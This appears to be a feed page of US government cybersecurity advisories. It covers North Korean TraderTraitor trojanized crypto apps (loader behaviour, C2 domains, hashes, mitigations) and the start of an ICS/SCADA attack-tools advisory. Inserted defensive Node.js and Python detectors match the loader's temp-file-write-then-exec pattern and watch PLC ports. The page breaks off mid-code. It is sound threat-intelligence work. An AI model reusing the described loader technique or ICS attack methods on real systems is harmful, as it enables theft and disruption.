The U.S. government has observed North Korean cyber actors targeting a variety of organizations in the blockchain technology and cryptocurrency industry, including cryptocurrency exchanges, decentralized finance (DeFi) protocols, play-to-earn cryptocurrency video games, cryptocurrency trading companies, venture capital funds investing in cryptocurrency, and individual holders of large amounts of cryptocurrency or valuable non-fungible tokens (NFTs). The activity described in this advisory involves social engineering of victims using a variety of communication platforms to encourage individuals to download trojanized cryptocurrency applications on Windows or macOS operating systems. The cyber actors then use the applications to gain access to the victim’s computer, propagate malware across the victim’s network environment, and steal private keys or exploit other security gaps. These activities enable additional follow-on activities that initiate fraudulent blockchain transactions.

The U.S. government previously published an advisory about North Korean state-sponsored cyber actors using AppleJeus malware to steal cryptocurrency: AppleJeus: Analysis of North Korea’s Cryptocurrency Malware. The U.S. government has also previously published advisories about North Korean state-sponsored cyber actors stealing money from banks using custom malware:

This advisory provides information on tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to stakeholders in the blockchain technology and cryptocurrency industry to help them identify and mitigate cyber threats against cryptocurrency. 


Technical Details

Threat Update

The U.S. government has identified a group of North Korean state-sponsored malicious cyber actors using tactics similar to the previously identified Lazarus Group (see AppleJeus: Analysis of North Korea’s Cryptocurrency Malware). The Lazarus Group used AppleJeus trojanized cryptocurrency applications targeting individuals and companies—including cryptocurrency exchanges and financial services companies—through the dissemination of cryptocurrency trading applications that were modified to include malware that facilitates theft of cryptocurrency. As of April 2022, North Korea’s Lazarus Group actors have targeted various firms, entities, and exchanges in the blockchain and cryptocurrency industry using spearphishing campaigns and malware to steal cryptocurrency. These actors will likely continue exploiting vulnerabilities of cryptocurrency technology firms, gaming companies, and exchanges to generate and launder funds to support the North Korean regime. 

Tactics, Techniques and Procedures

Intrusions begin with a large number of spearphishing messages sent to employees of cryptocurrency companies—often working in system administration or software development/IT operations (DevOps)—on a variety of communication platforms. The messages often mimic a recruitment effort and offer high-paying jobs to entice the recipients to download malware-laced cryptocurrency applications, which the U.S. government refers to as "TraderTraitor."

The term TraderTraitor describes a series of malicious applications written using cross-platform JavaScript code with the Node.js runtime environment using the Electron framework. The malicious applications are derived from a variety of open-source projects and purport to be cryptocurrency trading or price prediction tools. TraderTraitor campaigns feature websites with modern design advertising the alleged features of the applications (see figure 1).

 

Figure 1: Screenshot of CryptAIS website

The JavaScript code providing the core functions of the software is bundled with Webpack. Within the code is a function that purports to be an “update,” with a name such as UpdateCheckSync(), that downloads and executes a malicious payload (see figure 2). 

The update function makes an HTTP POST request to a PHP script hosted on the TraderTraitor project’s domain at either the endpoint /update/ or /oath/checkupdate.php. In recent variants, the server’s response is parsed as a JSON document with a key-value pair, where the key is used as an AES 256 encryption key in Cipher Block Chaining (CBC) or Counter (CTR) mode to decrypt the value. The decrypted data is written as a file to the system’s temporary directory, as provided by the os.tmpdir() method of Node.js, and executed using the child_process.exec() method of Node.js, which spawns a shell as a child process of the current Electron application. The text “Update Finished” is then logged to the shell for the user to see.

Observed payloads include updated macOS and Windows variants of Manuscrypt, a custom remote access trojan (RAT), that collects system information and has the ability to execute arbitrary commands and download additional payloads (see North Korean Remote Access Tool: COPPERHEDGE). Post-compromise activity is tailored specifically to the victim’s environment and at times has been completed within a week of the initial intrusion.  

 

Figure 2: Screenshot depicting the UpdateCheckSync() and supporting functions bundled within 60b3cfe2ec3100caf4afde734cfd5147f78acf58ab17d4480196831db4aa5f18 associated with DAFOM
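The following Node.js triage script is an added example, not code from the advisory or from the samples it analyzes. It checks the text of an extracted renderer.prod.js for the UpdateCheckSync() behaviour described above (a temp-directory file write followed by exec, the update endpoints, AES-256 CBC/CTR decryption, and the hardcoded IV the advisory lists for TokenAIS); the verdict labels, the 2000-character window and the sample fragments are assumptions constructed for illustration.

```javascript
'use strict';
// Input: bundle text, e.g. the contents of renderer.prod.js read as a string.

const WINDOW = 2000; // chars after a tmpdir() call searched for write + exec (assumed value)

// Bundle-wide strings taken from the advisory's description of the loader.
const MARKERS = {
  fnName: /\bUpdateCheckSync\b/,
  endpoint: /\/oath\/checkupdate\.php|\/update\/["'`]/,
  childProc: /child_process/,
  logText: /Update Finished/,
  fixedIv: /!@34QWer%\^78TYui/, // IV the advisory lists for TokenAIS
};
const DECIPHER = /createDecipheriv\s*\(\s*["'`]aes-256-(cbc|ctr)["'`]/i;

// Offsets where a temp-dir path is followed closely by a file write and then .exec().
function findDropExecChains(src) {
  const chains = [];
  const tmp = /\.tmpdir\s*\(\s*\)/g;
  let m;
  while ((m = tmp.exec(src)) !== null) {
    const tail = src.slice(m.index, m.index + WINDOW);
    const write = tail.search(/\.writeFile(Sync)?\s*\(/);
    const exec = tail.search(/\.exec\s*\(/);
    // A RegExp .exec() alone is common in benign code, so the write must come first.
    if (write !== -1 && exec !== -1 && write < exec) {
      chains.push({ tmpdirAt: m.index, writeAt: m.index + write, execAt: m.index + exec });
    }
  }
  return chains;
}

// Combine the chain check with the string markers and name the variant.
function triageBundle(src) {
  const hits = Object.keys(MARKERS).filter((k) => MARKERS[k].test(src));
  const chains = findDropExecChains(src);
  const dec = DECIPHER.exec(src);
  const mode = dec ? dec[1].toUpperCase() : null;

  let verdict = 'no-match';
  if (chains.length && (hits.includes('fnName') || hits.includes('endpoint'))) {
    verdict = 'matches-described-loader';
  } else if (chains.length || hits.includes('fixedIv')) {
    verdict = 'needs-review';
  }
  // Newer variants decrypt the response; older ones (AlticGO, Esilet) do not.
  const variant = verdict === 'matches-described-loader'
    ? (mode ? `encrypted payload (AES-256-${mode})` : 'plain payload (older variant)')
    : null;
  return { verdict, variant, hits, chains };
}

// Constructed, non-functional fragments used as test input (bodies elided with "...").
const SAMPLE_ENCRYPTED = [
  'function UpdateCheckSync(e){var u=h+"/oath/checkupdate.php";',
  'r.post(u,{form:{...}},function(a,b,c){var j=JSON.parse(c);',
  'var d=n.createDecipheriv("aes-256-cbc",k,"!@34QWer%^78TYui");',
  'var p=o.tmpdir()+"/"+f;s.writeFileSync(p,...);t.exec(...);',
  'console.log("Update Finished")})}',
].join('');

const SAMPLE_PLAIN = [
  'exports.UpdateCheckSync=function(){q("https://updates.example.invalid/update/",',
  'function(a,b,c){var p=o.tmpdir()+"/"+f;s.writeFileSync(p,...);t.exec(...)})};',
].join('');

// Benign look-alike: uses tmpdir() and a RegExp exec(), but never writes then executes.
const SAMPLE_BENIGN = [
  'function checkForUpdates(){var d=o.tmpdir();log("cache dir",d);}',
  'var v=/(\\d+)\\.(\\d+)/.exec(version);autoUpdater.checkForUpdates();',
].join('');

for (const [name, src] of Object.entries({ SAMPLE_ENCRYPTED, SAMPLE_PLAIN, SAMPLE_BENIGN })) {
  const r = triageBundle(src);
  console.log(`${name}: ${r.verdict}${r.variant ? ' / ' + r.variant : ''} [${r.hits.join(', ')}]`);
}
```

Treat a match as a lead for manual review rather than a conviction: legitimate Electron updaters also write to temporary directories, and a renamed function with a different endpoint only reaches the needs-review verdict.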

Indicators of Compromise

DAFOM
DAFOM purports to be a “cryptocurrency portfolio application.” A Mach-O binary packaged within the Electron application was signed by an Apple digital signature issued for the Apple Developer Team W58CYKFH67. The certificate associated with Apple Developer Team W58CYKFH67 has been revoked. A metadata file packaged in the DAFOM application provided the URL hxxps://github[.]com/dafomdev for bug reports. As of April 2022, this page was unavailable.

 

dafom[.]dev

Information as of February 2022:
IP Address: 45.14.227[.]58
Registrar: NameCheap, Inc.
Created: February 7, 2022
Expires: February 7, 2023

 

60b3cfe2ec3100caf4afde734cfd5147f78acf58ab17d4480196831db4aa5f18

Tags: dropper macos
Name: DAFOM-1.0.0.dmg
Size: 87.91 MB (92182575 bytes)
MD5: c2ea5011a91cd59d0396eb4fa8da7d21
SHA-1: b2d9ca7b6d1bbbe4864ea11dfca343b7e15597d8
SHA-256: 60b3cfe2ec3100caf4afde734cfd5147f78acf58ab17d4480196831db4aa5f18
ssdeep: 1572864:LGLBnolF9kPEiKOabR2QEs1B1/LuUQrbecE6Xwijkca/pzpfaLtIP:LGVnoT9kPZK9tVEwBxWbecR5Faxzpf0M

 

TokenAIS
TokenAIS purports to help “build a portfolio of AI-based trading” for cryptocurrencies. Mach-O binaries packaged within the Electron application contained an Apple digital signature issued for the Apple Developer Team RN4BTXA4SA. The certificate associated with Apple Developer Team RN4BTXA4SA has been revoked. The application requires users to “register” an account by entering an email address and a password to use its features. The malicious TraderTraitor code is a Node.js function called UpdateCheckSync() located in a file named update.js, which is bundled in a file called renderer.prod.js, which is in an archive called app.asar. This function passes the email address that the user provided and the system platform to the C2 server, decrypts the response using AES 256 in CBC mode with the hardcoded initialization vector (IV) !@34QWer%^78TYui and a key provided in the response, then writes the decrypted data to a file and executes it in a new shell.

 

tokenais[.]com

Information as of January 2022:
IP Address: 199.188.103[.]115
Registrar: NameCheap, Inc.
Created: January 27, 2022
Expires: January 27, 2023

 

5b40b73934c1583144f41d8463e227529fa7157e26e6012babd062e3fd7e0b03

Tags: dropper macos
Name: TokenAIS.app.zip
Size: 118.00 MB (123728267 bytes)
MD5: 930f6f729e5c4d5fb52189338e549e5e
SHA-1: 8e67006585e49f51db96604487138e688df732d3
SHA-256: 5b40b73934c1583144f41d8463e227529fa7157e26e6012babd062e3fd7e0b03
ssdeep: 3145728:aMFJlKVvw4+zLruAsHrmo5Vvw4+zLruAsHrmob0dC/E:aUlKtw4+/r2HNtw4+/r2HnMCM

 

CryptAIS
CryptAIS uses the same language as TokenAIS to advertise that it “helps build a portfolio of AI-based trading.” It is distributed as an Apple Disk Image (DMG) file that is digitally signed by an Apple digital signature issued for the Apple Developer Team CMHD64V5R8. The certificate associated with Apple Developer Team CMHD64V5R8 has been revoked. The application requires users to “register” an account by entering an email address and a password to use its features. The malicious TraderTraitor code is a Node.js function called UpdateCheckSync() located in a file named update.js, which is bundled in a file called renderer.prod.js, which is in an archive called app.asar. This function passes the email address that the user provided and the system platform to the C2 server, decrypts the response using AES 256 in CTR mode and a key provided in the response, then writes the decrypted data to a file and executes it in a new shell.

 

cryptais[.]com

Information as of August 2021:
IP Address: 82.102.31.14
Registrar: NameCheap, Inc.
Created: August 2, 2021
Expires: August 2, 2022

 

f0e8c29e3349d030a97f4a8673387c2e21858cccd1fb9ebbf9009b27743b2e5b

Tags: dropper macos
Name: CryptAIS[.]dmg
Size: 80.36 MB (84259810 bytes)
MD5: 4e5ebbecd22c939f0edf1d16d68e8490
SHA-1: f1606d4d374d7e2ba756bdd4df9b780748f6dc98
SHA-256: f0e8c29e3349d030a97f4a8673387c2e21858cccd1fb9ebbf9009b27743b2e5b
ssdeep: 1572864:jx9QOwiLDCUrJXsKMoGTwiCcKFI8jmrvGqjL2hX6QklBmrZgkZjMz+dPSpR0Xcpk:F9QOTPCUrdsKEw3coIg2Or6XBmrZgkZw

 

AlticGO
AlticGO was observed packaged as Nullsoft Scriptable Install System (NSIS) Windows executables that extracted an Electron application packaged for Windows. These executables contain a simpler version of TraderTraitor code in a function exported as UpdateCheckSync() located in a file named update.js, which is bundled in renderer.prod.js, which is in the app.asar archive. The function calls an external function located in a file node_modules/request/index.js bundled in renderer.prod.js to make an HTTP request to hxxps://www.alticgo[.]com/update/. One AlticGO sample, e3d98cc4539068ce335f1240deb1d72a0b57b9ca5803254616ea4999b66703ad, instead contacts hxxps://www.esilet[.]com/update/ (see below for more information about Esilet). Some image resources bundled with the application included the CreAI Deck logo (see below for more information about CreAI Deck). The response is written to disk and executed in a new shell using the child_process.exec() method in Node.js. Unlike newer versions of TraderTraitor, there is no mechanism to decrypt a payload.

 

alticgo[.]com

Information as of August 2020:
IP Address: 108.170.55[.]202
Registrar: NetEarth One Inc.
Created: August 8, 2020
Expires: August 8, 2021

 

765a79d22330098884e0f7ce692d61c40dfcf288826342f33d976d8314cfd819

Tags: dropper peexe nsis
Name: AlticGO.exe
Size: 43.54 MB (45656474 bytes)
MD5: 1c7d0ae1c4d2c0b70f75eab856327956
SHA-1: f3263451f8988a9b02268f0fb6893f7c41b906d9
SHA-256: 765a79d22330098884e0f7ce692d61c40dfcf288826342f33d976d8314cfd819
ssdeep: 786432:optZmVDkD1mZ1FggTqqLGAU6JXnjmDQ4YBXpleV0RnJYJKoSuDySLGh7yVPUXi7:opzKDginspAU6JXnJ46X+eC6cySihWVX
Compilation timestamp: 2018-12-15 22:26:14 UTC

 

e3d98cc4539068ce335f1240deb1d72a0b57b9ca5803254616ea4999b66703ad

Tags: dropper peexe nsis
Name: AlticGO_R.exe
Size: 44.58 MB (46745505 bytes)
MD5: 855b2f4c910602f895ee3c94118e979a
SHA-1: ff17bd5abe9f4939918f27afbe0072c18df6db37
SHA-256: e3d98cc4539068ce335f1240deb1d72a0b57b9ca5803254616ea4999b66703ad
ssdeep: 786432:LptZmVDkD1mQIiXUBkRbWGtqqLGAU6JXnjmDQ4YBXpleV0RnJYJKoSuDySLGh7yH:LpzKDgzRpWGwpAU6JXnJ46X+eC6cySiI
Compilation timestamp: 2020-02-12 16:15:17 UTC

 

8acd7c2708eb1119ba64699fd702ebd96c0d59a66cba5059f4e089f4b0914925

Tags: dropper peexe nsis
Name: AlticGO.exe
Size: 44.58 MB (46745644 bytes)
MD5: 9a6307362e3331459d350a201ad66cd9
SHA-1: 3f2c1e60b5fac4cf1013e3e1fc688be490d71a84
SHA-256: 8acd7c2708eb1119ba64699fd702ebd96c0d59a66cba5059f4e089f4b0914925
ssdeep: 786432:AptZmVDkD1mjPNDeuxOTKQqqLGAU6JXnjmDQ4YBXpleV0RnJYJKoSuDySLGh7yV7:ApzKDgqPxeuLpAU6JXnJ46X+eC6cySiG
Compilation timestamp: 2020-02-12 16:15:17 UTC

 

Esilet
Esilet claims to offer live cryptocurrency prices and price predictions. It contains a simpler version of TraderTraitor code in a function exported as UpdateCheckSync() located in a file named update.js, which is bundled in renderer.prod.js, which is in the app.asar archive. The function calls an external function located in a file node_modules/request/index.js bundled in renderer.prod.js to make an HTTP request to hxxps://www.esilet[.]com/update/. The response is written to disk and executed in a new shell using the child_process.exec() method in Node.js. Unlike newer versions of TraderTraitor, there is no mechanism to decrypt a payload. Esilet has been observed delivering payloads of at least two different macOS variants of Manuscrypt, 9d9dda39af17a37d92b429b68f4a8fc0a76e93ff1bd03f06258c51b73eb40efa and dced1acbbe11db2b9e7ae44a617f3c12d6613a8188f6a1ece0451e4cd4205156. 

 

Figure 3: Screenshot of the UpdateCheckSync() function in Esilet

esilet[.]com

Information as of June 2020:
IP Address: 104.168.98[.]156
Registrar: NameSilo, LLC
Created: June 12, 2020
Expires: June 12, 2021

 

greenvideo[.]nl

Likely legitimate but compromised. Information as of April 2022:
IP Address: 62.84.240[.]140
Registrar: Flexwebhosting
Created: February 26, 2018
Expires: Unknown

 

dafnefonseca[.]com

Likely legitimate but compromised. Information as of June 2020:
IP Address: 151.101.64[.]119
Registrar: PublicDomainRegistry
Created: August 27, 2019
Expires: August 27, 2022

 

haciendadeclarevot[.]com

Likely legitimate but compromised. Information as of June 2020:
IP Address: 185.66.41[.]17
Registrar: cdmon, 10DENCEHISPAHARD, S.L.
Created: March 2, 2005
Expires: March 2, 2023

 

sche-eg[.]org

Likely legitimate but compromised. Information as of June 2020:
IP Address: 160.153.235[.]20
Registrar: GoDaddy.com, LLC
Created: June 1, 2019
Expires: June 1, 2022

 

www.vinoymas[.]ch

Likely legitimate but compromised. Information as of June 2020:
IP Address: 46.16.62[.]238
Registrar: cdmon, 10DENCEHISPAHARD, S.L.
Created: January 24, 2010
Expires: Unknown

 

infodigitalnew[.]com

Likely legitimate but compromised. Information as of June 2020:
IP Address: 107.154.160[.]132
Registrar: PublicDomainRegistry
Created: June 20, 2020
Expires: June 20, 2022

 

9ba02f8a985ec1a99ab7b78fa678f26c0273d91ae7cbe45b814e6775ec477598

Tags: dropper macos
Name: Esilet.dmg
Size: 77.90 MB (81688694 bytes)
MD5: 53d9af8829a9c7f6f177178885901c01
SHA-1: ae9f4e39c576555faadee136c6c3b2d358ad90b9
SHA-256: 9ba02f8a985ec1a99ab7b78fa678f26c0273d91ae7cbe45b814e6775ec477598
ssdeep: 1572864:lffyoUnp5xmHVUTd+GgNPjFvp4YEbRU7h8cvjmUAm4Du73X0unpXkU:lfqHBmHo+BPj9CYEshLqcuAX0I0

 

9d9dda39af17a37d92b429b68f4a8fc0a76e93ff1bd03f06258c51b73eb40efa

Tags: trojan macho
Name: Esilet-tmpzpsb3
Size: 510.37 KB (522620 bytes)
MD5: 1ca31319721740ecb79f4b9ee74cd9b0
SHA-1: 41f855b54bf3db621b340b7c59722fb493ba39a5
SHA-256: 9d9dda39af17a37d92b429b68f4a8fc0a76e93ff1bd03f06258c51b73eb40efa
ssdeep: 6144:wAulcT94T94T97zDj1I/BkjhkbjZ8bZ87ZMSj71obV/7NobNo7NZTb7hMT5ETZ8I:wDskT1UBg2lirFbpR9mJGpmN

C2 Endpoints:

  • hxxps://greenvideo[.]nl/wp-content/themes/top.php
  • hxxps://dafnefonseca[.]com/wp-content/themes/top.php
  • hxxps://haciendadeclarevot[.]com/wp-content/top.php

 

dced1acbbe11db2b9e7ae44a617f3c12d6613a8188f6a1ece0451e4cd4205156

Tags: trojan macho
Name: Esilet-tmpg7lpp
Size: 38.24 KB (39156 bytes)
MD5: 9578c2be6437dcc8517e78a5de1fa975
SHA-1: d2a77c31c3e169bec655068e96cf4e7fc52e77b8
SHA-256: dced1acbbe11db2b9e7ae44a617f3c12d6613a8188f6a1ece0451e4cd4205156
ssdeep: 384:sdaWs0fDTmKnY4FPk6hTyQUitnI/kmCgr7lUryESll4yg9RpEwrUifJ8ttJOdy:sdayCkY4Fei9mhy/L9RBrny6y

C2 Endpoints: 

  • hxxps://sche-eg[.]org/plugins/top.php
  • hxxps://www.vinoymas[.]ch/wp-content/plugins/top.php
  • hxxps://infodigitalnew[.]com/wp-content/plugins/top.php

 

CreAI Deck
CreAI Deck claims to be a platform for “artificial intelligence and deep learning.” No droppers for it were identified, but the filenames of the below samples, win32.bin and darwin64.bin, match the naming conventions used by other versions of TraderTraitor when downloading a payload. Both are samples of Manuscrypt that contact hxxps://aideck[.]net/board.php for C2 using HTTP POST requests with multipart/form-data Content-Types.

 

creaideck[.]com

Information as of March 2020:
IP Address: 38.132.124[.]161
Registrar: NameCheap, Inc.
Created: March 9, 2020
Expires: March 9, 2021

 

aideck[.]net

Information as of June 2020:
IP Address: 89.45.4[.]151
Registrar: NameCheap, Inc.
Created: June 22, 2020
Expires: June 22, 2021

 

867c8b49d29ae1f6e4a7cd31b6fe7e278753a1ba03d4be338ed11fd1efc7dd36

Tags: trojan peexe
Name: win32.bin
Size: 2.10 MB (2198684 bytes)
MD5: 5d43baf1c9e9e3a939e5defd8f8fbd8d
SHA-1: d5ff73c043f3bb75dd749636307500b60a436550
SHA-256: 867c8b49d29ae1f6e4a7cd31b6fe7e278753a1ba03d4be338ed11fd1efc7dd36
ssdeep: 24576:y3SY+/2M3BMr7cdgSLBjbr4nzzy95VV7cEXV:ESZ2ESrHSV3D95oA
Compilation timestamp: 2020-06-23 06:06:35 UTC

 

89b5e248c222ebf2cb3b525d3650259e01cf7d8fff5e4aa15ccd7512b1e63957

Tags: trojan macho
Name: darwin64.bin
Size: 6.44 MB (6757832 bytes)
MD5: 8397ea747d2ab50da4f876a36d673272
SHA-1: 48a6d5141e25b6c63ad8da20b954b56afe589031
SHA-256: 89b5e248c222ebf2cb3b525d3650259e01cf7d8fff5e4aa15ccd7512b1e63957
ssdeep: 49152:KIH1kEh7zIXlDYwVhb26hRKtRwwfs62sRAdNhEJNDvOL3OXl5zpF+FqBNihzTvff:KIH1kEhI1LOJtm2spB

Mitigations

North Korean state-sponsored cyber actors use a full array of tactics and techniques to exploit computer networks of interest, acquire sensitive cryptocurrency-intellectual property, and gain financial assets. The U.S. government recommends implementing mitigations to protect critical infrastructure organizations as well as financial sector organizations in the blockchain technology and cryptocurrency industry.

  • Apply defense-in-depth security strategy. Apply security principles—such as least access models and defense-in-depth—to user and application privileges to help prevent exploitation attempts from being successful. Use network segmentation to separate networks into zones based on roles and requirements. Separate network zones can help prevent lateral movement throughout the organization and limit the attack surface. See NSA’s Top Ten Cybersecurity Mitigation Strategies for strategies enterprise organizations should use to build a defense-in-depth security posture. 
  • Implement patch management. Initial and follow-on exploitation involves leveraging common vulnerabilities and exposures (CVEs) to gain access to a networked environment. Organizations should have a timely vulnerability and patch management program in place to mitigate exposure to critical CVEs. Prioritize patching of internet-facing devices and monitor them accordingly for any malicious logic attacks.
  • Enforce credential requirements and multifactor authentication. North Korean malicious cyber actors continuously target user credentials, email, social media, and private business accounts. Organizations should ensure users change passwords regularly to reduce the impact of password spraying and other brute force techniques. The U.S. government recommends organizations implement and enforce multifactor authentication (MFA) to reduce the risk of credential theft. Be aware of MFA interception techniques for some MFA implementations and monitor for anomalous logins.
  • Educate users on social engineering on social media and spearphishing. North Korean actors rely heavily on social engineering, leveraging email and social media platforms to build trust and send malicious documents to unsuspecting users. A cybersecurity aware workforce is one of the best defenses against social engineering techniques like phishing. User training should include how to identify social engineering techniques and awareness to only open links and attachments from trusted senders.
  • Implement email and domain mitigations. Maintain awareness of themed emails surrounding current events. Malicious cyber actors use current events as lure for potential victims as observed during the COVID-19 pandemic. Organizations should have a robust domain security solution that includes leveraging reputation checks and closely monitoring or blocking newly registered domains (NRDs) in enterprise traffic. NRDs are commonly established by threat actors prior to malicious engagement.
    • HTML and email scanning. Organizations should disable HTML from being used in emails and scan email attachments. Embedded scripts may be hard for an antivirus product to detect if they are fragmented. An additional malware scanning interface product can be integrated to combine potentially malicious payloads and send the payload to the primary antivirus product. Hyperlinks in emails should also be scanned and opened with precautionary measures to reduce the likelihood of a user clicking on a malicious link.
  • Endpoint protection. Although network security is critical, device mobility often means traveling and connecting to multiple different networks that offer varying levels of security. To reduce the risk of introducing exposed hosts to critical networks, organizations should ensure mobile devices have installed security suites to detect and mitigate malware.
  • Enforce application security. Application allowlisting enables the organization to monitor programs and only allow those on the approved allowlist to execute. Allowlisting helps to stop the initial attack, even if the user clicks a malicious link or opens a malicious attachment. Implement baseline rule sets, such as NSA’s Limiting Location Data Exposure guidance, to block execution of unauthorized or malicious programs.
    • Disable macros in office products. Macros are a common method for executing code through an attached office document. Some office products allow for the disabling of macros that originate from outside of the organization, providing a hybrid approach when the organization depends on the legitimate use of macros.
      • Windows specific settings can be configured to block internet-originated macros from running. This can be done in the Group Policy Administrative Templates for each of the associated Office products (specifically Word, Excel and PowerPoint). Other productivity software, such as LibreOffice and OpenOffice, can be configured to set the Macro Security Level.
  • Be aware of third-party downloads—especially cryptocurrency applications. North Korean actors have been increasingly active with currency generation operations. Users should always verify file downloads and ensure the source is from a reputable or primary (preferred) source and not from a third-party vendor. Malicious cyber actors have continuously demonstrated the ability to trojanize applications and gain a foothold on host devices.
  • Create an incident response plan to respond to possible cyber intrusions. The plan should include reporting incidents to both the FBI and CISA—quick reporting can reduce the severity of incidents and provide valuable information to investigators. Contact information can be found below.

Contact

All organizations should report incidents and anomalous activity to CISA 24/7 Operations Center at report@cisa.gov or (888) 282-0870 and/or to the FBI via your local FBI field office or the FBI’s 24/7 CyWatch at (855) 292-3937 or CyWatch@fbi.gov.

Disclaimer

The information in this advisory is provided "as is" for informational purposes only. The FBI, CISA, and Treasury do not provide any warranties of any kind regarding this information or endorse any commercial product or service, including any subjects of analysis.
 

Revisions
  • Initial Version: April 18, 2022


AA22-103A: APT Cyber Tools Targeting ICS/SCADA Devices

US-CERT Security Alerts - Wed, 04/13/2022 - 09:00
Original release date: April 13, 2022 | Last revised: April 14, 2022
Summary

Actions to Take Today to Protect ICS/SCADA Devices:
• Enforce multifactor authentication for all remote access to ICS networks and devices whenever possible.
• Change all passwords to ICS/SCADA devices and systems on a consistent schedule, especially all default passwords, to device-unique strong passwords to mitigate password brute force attacks and to give defender monitoring systems opportunities to detect common attacks.
• Leverage a properly installed continuous OT monitoring solution to log and alert on malicious indicators and behaviors.

The Department of Energy (DOE), the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), and the Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory (CSA) to warn that certain advanced persistent threat (APT) actors have exhibited the capability to gain full system access to multiple industrial control system (ICS)/supervisory control and data acquisition (SCADA) devices, including:

  • Schneider Electric programmable logic controllers (PLCs),
  • OMRON Sysmac NEX PLCs, and
  • Open Platform Communications Unified Architecture (OPC UA) servers.

The APT actors have developed custom-made tools for targeting ICS/SCADA devices. The tools enable them to scan for, compromise, and control affected devices once they have established initial access to the operational technology (OT) network. Additionally, the actors can compromise Windows-based engineering workstations, which may be present in information technology (IT) or OT environments, using an exploit that compromises an ASRock motherboard driver with known vulnerabilities. By compromising and maintaining full system access to ICS/SCADA devices, APT actors could elevate privileges, move laterally within an OT environment, and disrupt critical devices or functions.

DOE, CISA, NSA, and the FBI urge critical infrastructure organizations, especially Energy Sector organizations, to implement the detection and mitigation recommendations provided in this CSA to detect potential malicious APT activity and harden their ICS/SCADA devices. 


Technical Details

APT actors have developed custom-made tools that, once the actors have established initial access in an OT network, enable them to scan for, compromise, and control certain ICS/SCADA devices, including the following:

  • Schneider Electric MODICON and MODICON Nano PLCs, including (but may not be limited to) TM251, TM241, M258, M238, LMC058, and LMC078;
  • OMRON Sysmac NJ and NX PLCs, including (but may not be limited to) NEX NX1P2, NX-SL3300, NX-ECC203, NJ501-1300, S8VK, and R88D-1SN10F-ECT; and 
  • OPC Unified Architecture (OPC UA) servers.  

The APT actors’ tools have a modular architecture and enable cyber actors to conduct highly automated exploits against targeted devices. The tools have a virtual console with a command interface that mirrors the interface of the targeted ICS/SCADA device. Modules interact with targeted devices, enabling operations by lower-skilled cyber actors to emulate higher-skilled actor capabilities.

The APT actors can leverage the modules to scan for targeted devices, conduct reconnaissance on device details, upload malicious configuration/code to the targeted device, back up or restore device contents, and modify device parameters. 

In addition, the APT actors can use a tool that installs and exploits a known-vulnerable ASRock-signed motherboard driver, AsrDrv103.sys, exploiting CVE-2020-15368 to execute malicious code in the Windows kernel. Successful deployment of this tool can allow APT actors to move laterally within an IT or OT environment and disrupt critical devices or functions.

APT Tool for Schneider Electric Devices  

The APT actors’ tool for Schneider Electric devices has modules that interact via normal management protocols and Modbus (TCP 502). Modules may allow cyber actors to:

  • Run a rapid scan that identifies all Schneider PLCs on the local network via User Datagram Protocol (UDP) multicast with a destination port of 27127 (Note: UDP 27127 is a standard discovery scan used by engineering workstations to discover PLCs and may not be indicative of malicious activity);
  • Brute-force Schneider Electric PLC passwords using CODESYS and other available device protocols via UDP port 1740 against defaults or a dictionary word list (Note: this capability may work against other CODESYS-based devices depending on individual design and function, and this report will be updated as more information becomes available); 
  • Conduct a denial-of-service attack to prevent network communications from reaching the PLC;
  • Sever connections, requiring users to re-authenticate to the PLC, likely to facilitate capture of credentials; 
  • Conduct a ‘packet of death’ attack to crash the PLC until a power cycle and configuration recovery is conducted; and 
  • Send custom Modbus commands (Note: this capability may work against Modbus other than in Schneider Electric PLCs).

Refer to the appendix for tactics, techniques, and procedures (TTPs) associated with this tool.
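
A detection sketch for the ports listed above, added here as an example and not taken from the advisory or any vendor tool: it flags UDP 27127, UDP 1740, and TCP 502 flows from hosts outside an engineering-workstation allowlist, and flags bursts of UDP 1740 traffic toward one device even when the source is allowed. The flow record format, IP addresses, multicast group, and thresholds are assumptions constructed for the example.

```python
from collections import defaultdict
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

# Protocol/port pairs the advisory associates with the Schneider Electric tool.
WATCHED = {
    ("udp", 27127): "discovery",  # also used by legitimate engineering workstations
    ("udp", 1740): "codesys",
    ("tcp", 502): "modbus",
}

# Assumptions for this example (site-specific, hypothetical values).
ALLOWED_SOURCES = [ip_network("10.20.0.10/32"), ip_network("10.20.0.11/32")]
BURST_THRESHOLD = 20  # UDP 1740 flows from one source to one device...
BURST_WINDOW_S = 60   # ...within this many seconds


@dataclass(frozen=True)
class Flow:
    ts: float
    proto: str
    src: str
    dst: str
    dport: int


def parse_flows(lines):
    """Parse 'ts proto src dst dport' records; return (flows, rejected_count)."""
    flows, rejected = [], 0
    for line in lines:
        try:
            ts, proto, src, dst, dport = line.split()
            ip_address(src)
            ip_address(dst)
            flows.append(Flow(float(ts), proto.lower(), src, dst, int(dport)))
        except ValueError:  # wrong field count, bad address, or bad number
            rejected += 1
    return flows, rejected


def is_allowed(src):
    addr = ip_address(src)
    return any(addr in net for net in ALLOWED_SOURCES)


def detect(flows):
    """Return de-duplicated alerts as (kind, protocol_label, src, dst) tuples."""
    alerts, seen = [], set()
    recent = defaultdict(list)  # (src, dst) -> UDP 1740 timestamps inside the window

    def raise_once(kind, label, f):
        key = (kind, label, f.src, f.dst)
        if key not in seen:
            seen.add(key)
            alerts.append(key)

    for f in sorted(flows, key=lambda x: x.ts):
        label = WATCHED.get((f.proto, f.dport))
        if label is None:
            continue
        # Discovery on UDP 27127 is normal from a workstation, so only the
        # source decides whether it is worth an alert.
        if not is_allowed(f.src):
            raise_once("unapproved-source", label, f)
        # A burst is reported even for allowed sources: a compromised
        # engineering workstation would pass the allowlist check.
        if label == "codesys":
            window = [t for t in recent[(f.src, f.dst)] if f.ts - t < BURST_WINDOW_S]
            window.append(f.ts)
            recent[(f.src, f.dst)] = window
            if len(window) >= BURST_THRESHOLD:
                raise_once("codesys-burst", label, f)
    return alerts


# Constructed sample records (not real traffic).
SAMPLE_FLOWS = [
    "100.0 udp 10.20.0.10 239.192.0.1 27127",  # allowed workstation, discovery
    "101.0 tcp 10.20.0.10 10.20.1.5 502",      # allowed workstation, Modbus
    "102.0 udp 10.20.0.77 239.192.0.1 27127",  # unknown host, discovery
    "103.0 tcp 10.20.0.77 10.20.1.5 443",      # not a watched port
    "not a flow record",                       # malformed line
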